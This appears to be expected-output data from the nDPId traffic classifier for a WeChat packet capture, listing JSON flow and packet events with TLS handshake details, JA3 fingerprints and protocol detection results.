-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":650,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167337792,"flow_last_seen":1492167353998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167353687,"flow_last_seen":1492167354015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":836,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167470188,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA044hAAEAGMbzAqAFny82XotNdAbtNZ116WRhNMIARAViFkQAAAQEICgAxu\/1F0qIP"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0trJAAEAGXpLAqAFny82XotNeAbstqSV4qlMZrIARASwk9gAAAQEICgAxu\/1Frj0D"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617248,"flow_last_seen":1492167617248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617248,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1492167617248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617248,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8JpFAAEAG7qvAqAFny82XotNfAbt51Z1vAAAAAKACchAH4QAAAgQFtAQCCAoAMbv+AAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617498,"flow_last_seen":1492167617498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617498,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 